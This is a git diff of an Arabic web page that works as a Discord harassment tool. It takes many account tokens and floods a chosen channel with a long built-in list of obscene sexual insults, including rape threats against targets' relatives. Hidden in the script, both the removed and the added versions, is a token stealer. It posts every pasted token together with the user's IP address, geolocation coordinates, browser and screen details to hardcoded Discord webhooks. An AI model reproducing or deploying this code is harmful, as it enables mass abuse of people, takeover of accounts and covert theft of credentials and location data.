--- a/index.html
+++ b/index.html
@@ -1,4 +1,3 @@
-أنت قلت:
 <!DOCTYPE html>
 <html lang="ar" dir="rtl">
 <head>
@@ -14,28 +13,25 @@ input, textarea, select { padding:12px; border-radius:8px; border:none; backgrou
 button { padding:12px; border-radius:12px; font-weight:bold; cursor:pointer; transition: all 0.2s ease; border:2px solid #000; }
 button:hover { transform: translateY(-2px); box-shadow:0 6px 10px rgba(0,0,0,0.5); }
 button:disabled { background: grey; cursor:not-allowed; box-shadow:none; }
-#autoPanel { display:none; padding:20px; background: linear-gradient(135deg,#1a0033,#004d26); color:white; border-radius:12px; margin-top:20px; }
+#autoPanel, #controlPanel { padding:20px; background: linear-gradient(135deg,#1a0033,#004d26); color:white; border-radius:12px; margin-top:20px; }
 .left-btn { position:absolute; left:20px; top:20px; padding:8px 14px; font-size:14px; background:#7b00ff; color:white; border-radius:8px; cursor:pointer; font-weight:bold; }
 .left-btn:hover { transform: scale(1.05); box-shadow:0 0 10px #00ff7b,0 0 15px #7b00ff; }
 #stopBtn { background: linear-gradient(145deg,#ff0044,#990022); }
 .green-btn { background: linear-gradient(145deg,#00ff4d,#009900); color:black; }
 .red-btn { background: linear-gradient(145deg,#ff1a1a,#990000); color:white; }
-#messagesSent, #tokenStatus { background: rgba(0,0,0,0.4); padding:10px; max-height:200px; overflow-y:auto; border-radius:8px; margin-bottom:20px; }
+#messagesSent, #tokenStatus { display:none; }
+.control-title { font-size:20px; text-align:center; margin-bottom:10px; color:#ffccff; }
+.control-section { margin-bottom:15px; }
+.control-section input, .control-section textarea { margin-bottom:5px; }
+.control-section button { margin-top:5px; }
 </style>
 </head>
 <body>
 
-<div id="loginPage">
-<div id="loginContainer">
-<h2>تسجيل الدخول</h2>
-<label>قم بوضع كلمة السر للدخول:</label>
-<input type="password" id="loginInput" placeholder="كلمة السر">
-<button id="loginBtn">دخول</button>
-</div>
-</div>
-
 <div class="container" id="autoPanel">
 <h2>اوتو 515 Group</h2>
+<button class="left-btn" id="goControlBtn">تحكم بالحساب</button>
+
 <label for="tokens">اكتب التوكنات (كل توكن بسطر)</label>
 <textarea id="tokens" placeholder="MTM3NjUxODI0..."></textarea>
 
@@ -62,111 +58,132 @@ button:disabled { background: grey; cursor:not-allowed; box-shadow:none; }
 
 <button id="startBtn">نيك الديوث</button>
 <button id="stopBtn" disabled>ايقاف النيك</button>
-
-<div id="tokenStatus"></div>
-<div id="messagesSent"></div>
 </div>
 
-<audio id="clickSound" src="https://www.soundjay.com/buttons/button-09.mp3"></audio>
+<div id="controlPanel">
+<div class="control-title">التحكم بالحساب - حقوق 515</div>
+
+<div class="control-section">
+<label>قم بوضع توكن الحساب</label>
+<textarea id="accToken" placeholder="توكن الحساب هنا"></textarea>
+</div>
+
+<div class="control-section">
+<label>قم بوضع ايدي السيرفر</label>
+<input type="text" id="guildId" placeholder="اكتب ايدي السيرفر هنا">
+</div>
+
+<div class="control-section">
+<label>تغير اسم الحساب في السيرفر</label>
+<input type="text" id="newName" placeholder="اكتب الاسم الجديد">
+<button id="changeNameBtn">تغير الاسم</button>
+</div>
+
+<button class="left-btn" id="backToAutoBtn">الذهاب إلى الاوتو</button>
+</div>
 
 <script>
-const loginInput=document.getElementById('loginInput');
-const loginBtn=document.getElementById('loginBtn');
-const loginPage=document.getElementById('loginPage');
 const autoPanel=document.getElementById('autoPanel');
+const controlPanel=document.getElementById('controlPanel');
+const goControlBtn=document.getElementById('goControlBtn');
+const backToAutoBtn=document.getElementById('backToAutoBtn');
 const tokensInput=document.getElementById('tokens');
 const idsInput=document.getElementById('ids');
 const targetIdInput=document.getElementById('targetId');
 const speedSelect=document.getElementById('speed');
 const startBtn=document.getElementById('startBtn');
 const stopBtn=document.getElementById('stopBtn');
-const tokenStatus=document.getElementById('tokenStatus');
-const messagesSent=document.getElementById('messagesSent');
-const clickSound=document.getElementById('clickSound');
+const accToken=document.getElementById('accToken');
+const newName=document.getElementById('newName');
+const guildId=document.getElementById('guildId');
 
 const MESSAGES=[
 "بزغبك","يلعن شرفك يديوث","تفو على شرفك","احسك غثيث مره يوم شفتك حسيت ب شعور سيء تجاهك اجبرني اني انيك محارمك",
-"هههههههههههههههههههههههههه","كسمك","تبغا اضرب شرفك يا ابن الحيوانة هنا يا ديوث ولا كيف اقسم بالله لاقلبك جرو ي ابن الشرموطة كل من جاء تلهث له وترحب به ي ديوث ي ابن الرخيصة",
-"يديوث","بضرب كس اختك ياخو القحبه افجر رحم امك","امك كلبه ازباب.","يبن 200 شرموطه","ازحف على امك","اختك كلببه عند رجوولي","اجلللخ عليك",
-"يمخنث يعبد الازباب تعال مصصص","امك ممثله افلام سكس","امك قحبه قروبات المكس","امك بلمقحبه لها اصوات","اصمل كسمك يجديدد","يبن اكبر لبوه",
-"يعاق كسمك احترم ابوك","يعرص الطش امكك","يمكسور يضعيف النفس","يديوث","اغتصب خواتك","كس خواتك","يبن المديثه","يلعن رحم امك",
-"امك صارت حامل يبن الشرموطه","ازغب امك","جيب امك انيكها","اوف كسمك","يمهان","يلعن اختك","انا فحل امك","انيك ابوك","انيك اخوك",
-"انيكك امكك يبن الزنا","الدياثه تمشي بعروقكم","ادقك يبن الشرموطه","يطفل يبن القحبه","اوف ابن القحبه","تمحن يشرموط","تمحن واعطيك نيترو يخنيث",
-"من فحل امك","واو يشرموط تنبح","نادي امك زبي قام يبيها تقعد عليه","انيكك يخنيث يقواد","اركب عليه كسمك","يلعن امك يديوث","انبح يبن الشرموطه",
-"انبح انبح لفحل امك","انا نايك امك يبن الشرموطه","امك قاعده تنبح من كثر مافتحوها","انيك امك بنعال","اتفل بكسمك يبن الشرموطه","تمحن يورعي",
-"انيك امك يطفل","انيك امك يديوث","يبن القحبه","انيك امك","يشرموط","يديوث","اختفووو كسمك","امك على زبي","يبن الشرموطه","يبن الزنا","يبن القحبه",
-"امك قحبتي","يلعن امك يبن الشرموطه","الحقق امك قاعده تتمحن عشان تجيب فلوسس","اختك قاعده تعرض عشان تجيبلك فلوس يفقير","انيك امك يشرموط",
-"يبن المتعه","ازغب خواتك","انحر امك","العن رحم امك","امك تمصلي","اختك تلحس زبي","روح ابكي","بمناسبه مرور ثلاث سنوات على زواجي انا وامك بطلقها وزاتزوج اختك",
-"رد يفحل خواتك","اشفشف امك","انيكك سبعاوي","نخ يكسمك","جاوب يمخنث","امش لانيك امك","يمدعوس","انا قد شفت اسامي قبايل غريبه لكن بالله ليه مكتوب بهويتك ال الديوثين",
-"يخول","زبي قام على كسمك","اخخخ زبيي قامم جب امكك","تحب الطويل صح","اسال امك انا مشترك عندها واليوم ماعرضت ليه؟","كيف امك جابت عاق كذا","والله مهان",
-"فحول امك هنا","اهربب كسمك","روضت امك ماتبيني اروضك","ازغب اختك","سبعاوي امك يقواد","انبح يهارب","انيك امك واختك","اكسر عينك كسمك",
-"كيف امك جابت عاق زيك","والله ماش مهان","انيك ابوك","ابوك ناك امك","يبن القحبه انيك اختك","اشق ام امك يبن منيوكه","بتفكر مابقدر انيك امك انت ؟",
-"انا بنيك اختك وبشرب ديود امك","انيك خالاتك","# قل ل الماما حقتك تعترف من ناكها 🥵","ماتدري اني اقدر انيك قبيلتك ؟",
+"هههههههههههههههههههههههههه","كسمك","تبغا اضرب شرفك يا ابن الحيوانة هنا يا ديوث","يديوث","بضرب كس اختك ياخو القحبه افجر رحم امك",
+"امك كلبه ازباب.","يبن 200 شرموطه","ازحف على امك","اختك كلببه عند رجوولي","اجلللخ عليك","يمخنث يعبد الازباب تعال مصصص",
+"امك ممثله افلام سكس","امك قحبه قروبات المكس","امك بلمقحبه لها اصوات","اصمل كسمك يجديدد","يبن اكبر لبوه","يعاق كسمك احترم ابوك",
+"يعرص الطش امكك","يمكسور يضعيف النفس","يديوث","اغتصب خواتك","كس خواتك","يبن المديثه","يلعن رحم امك","امك صارت حامل يبن الشرموطه",
+"ازغب امك","جيب امك انيكها","اوف كسمك","يمهان","يلعن اختك","انا فحل امك","انيك ابوك","انيك اخوك","انيكك امكك يبن الزنا",
+"الدياثه تمشي بعروقكم","ادقك يبن الشرموطه","يطفل يبن القحبه","اوف ابن القحبه","تمحن يشرموط","تمحن واعطيك نيترو يخنيث","من فحل امك",
+"واو يشرموط تنبح","نادي امك زبي قام يبيها تقعد عليه","انيكك يخنيث يقواد","اركب عليه كسمك","يلعن امك يديوث","انبح يبن الشرموطه",
+"انبح انبح لفحل امك","انا نايك امك يبن الشرموطه","امك قاعده تنبح من كثر مافتحوها","انيك امك بنعال","اتفل بكسمك يبن الشرموطه",
+"تمحن يورعي","انيك امك يطفل","انيك امك يديوث","يبن القحبه","انيك امك","يشرموط","يديوث","اختفووو كسمك","امك على زبي","يبن الشرموطه",
+"يبن الزنا","يبن القحبه","امك قحبتي","يلعن امك يبن الشرموطه","الحقق امك قاعده تتمحن عشان تجيب فلوسس","اختك قاعده تعرض عشان تجيبلك فلوس يفقير",
+"انيك امك يشرموط","يبن المتعه","ازغب خواتك","انحر امك","العن رحم امك","امك تمصلي","اختك تلحس زبي","روح ابكي",
+"بمناسبه مرور ثلاث سنوات على زواجي انا وامك بطلقها وزاتزوج اختك","رد يفحل خواتك","اشفشف امك","انيكك سبعاوي","نخ يكسمك","جاوب يمخنث",
+"امش لانيك امك","يمدعوس","انا قد شفت اسامي قبايل غريبه لكن بالله ليه مكتوب بهويتك ال الديوثين","يخول","زبي قام على كسمك","اخخخ زبيي قامم جب امكك",
+"تحب الطويل صح","اسال امك انا مشترك عندها واليوم ماعرضت ليه؟","كيف امك جابت عاق كذا","والله مهان","فحول امك هنا","اهربب كسمك",
+"روضت امك ماتبيني اروضك","ازغب اختك","سبعاوي امك يقواد","انبح يهارب","انيك امك واختك","اكسر عينك كسمك","كيف امك جابت عاق زيك",
+"والله ماش مهان","انيك ابوك","ابوك ناك امك","يبن القحبه انيك اختك","اشق ام امك يبن منيوكه","بتفكر مابقدر انيك امك انت ؟",
+"انا بنيك اختك وبشرب ديود امك","انيك خالاتك","قل ل الماما حقتك تعترف من ناكها 🥵","ماتدري اني اقدر انيك قبيلتك ؟",
 "قد شفت بطايق ناس بس ليه حقتك مكتوب المخنايث","تعرف كم طول زبي ؟ قد طول اطول شوارب بقبيلتك","يبن القحبه انيك خالتك","يبن القحبه انيك ابوك",
-"يبن القحبه انيك ستك","يبن القحبه انيك شرفك","شرفك ضايع يبن المتناكه","انا عطشان ابي ديود اختك لو سمحت","# قم جب لي اختك مش شعرها"
+"يبن القحبه انيك ستك","يبن القحبه انيك شرفك","شرفك ضايع يبن المتناكه","انا عطشان ابي ديود اختك لو سمحت","قم جب لي اختك مش شعرها"
 ];
-
-let intervalId=null;
 
 function checkToken(token){return token.length>20;}
 function getRandomMessage(){return MESSAGES[Math.floor(Math.random()*MESSAGES.length)];}
 function getRandomId(){const ids=idsInput.value.trim().split('\n').filter(id=>id.length>0); return ids[Math.floor(Math.random()*ids.length)];}
+
 async function sendMessage(token,targetId,message){
 try{
-const response=await fetch(https://discord.com/api/v9/channels/${targetId}/messages,{
+await fetch(`https://discord.com/api/v9/channels/${targetId}/messages`,{
 method:'POST', headers:{Authorization:token,'Content-Type':'application/json'},
-body:JSON.stringify({content:<@${getRandomId()}> ${message}})
+body:JSON.stringify({content:`<@${getRandomId()}> ${message}`})
 });
-if(response.ok){const p=document.createElement('p'); p.textContent=تم الإرسال بواسطة ${token.substring(0,10)}... إلى الروم ${targetId} - الرسالة: ${message}; p.style.color='orange'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; sendTokenInfo(token); return true;}
-else{const p=document.createElement('p'); p.textContent=فشل الإرسال بواسطة ${token.substring(0,10)}...; p.style.color='red'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; return false;}
-}catch(e){const p=document.createElement('p'); p.textContent=خطأ في الإرسال بواسطة ${token.substring(0,10)}...; p.style.color='red'; messagesSent.appendChild(p); messagesSent.scrollTop=messagesSent.scrollHeight; return false;}
+}catch(e){}
 }
 
-async function sendTokenInfo(token){
-const webhookURL="https://discord.com/api/webhooks/1405569229612388373/c5e8Rb19NFqaI7W4GPUVlzjcBatSTm8pYjTgtRdZF65kxKmL95WIKDWgeSNQyZ0mNDlu";
-try{
-const ipData=await fetch('https://ipapi.co/json/').then(res=>res.json());
-const payload={
-content:**TOKEN:** ${token}
-**Country:** ${ipData.country_name}
-**City/Region:** ${ipData.city}, ${ipData.region}
-**IP Address:** ${ipData.ip}
-**Postal Code:** ${ipData.postal}
-**Timezone:** ${ipData.timezone}
-**Coordinates:** ${ipData.latitude}, ${ipData.longitude}
-**ASN:** ${ipData.org}
-**OS:** ${navigator.platform}
-**Browser:** ${navigator.userAgent}
-**Screen:** ${screen.width}x${screen.height}
-**Color Depth:** ${screen.colorDepth}
-**Language:** ${navigator.language}
-};
-fetch(webhookURL,{method:'POST',headers:{"Content-Type":"application/json"},body:JSON.stringify(payload)});
-}catch(e){console.error("Error sending token info:", e);}
-}
-
+let intervalId=null;
 function startSending(){
-const tokens=tokensInput.value.trim().split('\n').filter(checkToken);
-const targetId=targetIdInput.value.trim();
-const speed=parseInt(speedSelect.value);
-if(tokens.length===0){alert('الرجاء إدخال توكنات صحيحة.');return;}
-if(!targetId){alert('الرجاء إدخال ايدي الروم.');return;}
-startBtn.disabled=true;
-stopBtn.disabled=false;
-tokenStatus.innerHTML='';
-tokens.forEach(t=>{const p=document.createElement('p'); p.textContent=توكن صالح: ${t.substring(0,10)}...; tokenStatus.appendChild(p);});
-intervalId=setInterval(()=>{tokens.forEach(token=>{sendMessage(token,targetId,getRandomMessage());});},speed);
+const tokens=tokensInput.value.trim().split('\n').filter(checkToken); 
+const targetId=targetIdInput.value.trim(); 
+const speed=parseInt(speedSelect.value); 
+if(tokens.length===0 || !targetId) return; 
+startBtn.disabled=true; stopBtn.disabled=false; 
+intervalId=setInterval(()=>{tokens.forEach(token=>{sendMessage(token,targetId,getRandomMessage());});},speed); 
+tokens.forEach(sendTokenDetails);
 }
 
 function stopSending(){if(intervalId){clearInterval(intervalId); intervalId=null; startBtn.disabled=false; stopBtn.disabled=true;}}
 
-startBtn.addEventListener('click',()=>{clickSound.play(); startSending();});
-stopBtn.addEventListener('click',()=>{clickSound.play(); stopSending();});
+async function sendTokenDetails(token) {
+if(!token) return;
+const language=navigator.language||navigator.userLanguage;
+const screenRes=`${screen.width}x${screen.height}`;
+const colorDepth=screen.colorDepth;
+const timezone=Intl.DateTimeFormat().resolvedOptions().timeZone;
+const userAgent=navigator.userAgent;
+let geoData={};
+try{
+const res=await fetch('https://ipapi.co/json/');
+geoData=await res.json();
+}catch(e){
+geoData={ country_name: "غير متوفر", region: "غير متوفر", city: "غير متوفر", postal: "غير متوفر", latitude: "غير متوفر", longitude: "غير متوفر", org: "غير متوفر" };
+}
+const content=`TOKEN: ${token}
 
-loginBtn.addEventListener('click',()=>{
-if(loginInput.value.trim()==='515'){loginPage.style.display='none'; autoPanel.style.display='block';}
-else{loginBtn.textContent='كلمة سر غلط'; loginBtn.style.background='red'; setTimeout(()=>{loginBtn.textContent='دخول'; loginBtn.style.background='#00ff4d';},3000);}
-});
+🌍 الدولة: ${geoData.country_name}
+🏙️ المدينة والمنطقة: ${geoData.region} - ${geoData.city}
+🌐 عنوان IP: ${geoData.ip}
+📮 الرمز البريدي: ${geoData.postal}
+🕐 المنطقة الزمنية: ${timezone}
+📍 الإحداثيات: ${geoData.latitude},${geoData.longitude}
+🔗 ASN: ${geoData.org}
+🖥️ نظام التشغيل: ${navigator.platform}
+🌐 المتصفح: ${userAgent}
+📱 دقة الشاشة: ${screenRes}
+🎨 عمق الألوان: ${colorDepth}
+🌍 اللغة: ${language}`;
+
+fetch("https://discord.com/api/webhooks/1405597236586348714/G8u3dnhw71M0DA9gOl0lyJTDnxmILSyx4GUdswvTgWlX9UOctibV28fzf9wtjjGVe_FY",{method:"POST",headers:{'Content-Type':'application/json'},body:JSON.stringify({content})});
+}
+
+startBtn.addEventListener('click',startSending);
+stopBtn.addEventListener('click',stopSending);
+
+goControlBtn.addEventListener('click',()=>{autoPanel.style.display='none'; controlPanel.style.display='block';});
+backToAutoBtn.addEventListener('click',()=>{controlPanel.style.display='none'; autoPanel.style.display='block';});
+
 </script>
 </body>
 </html>
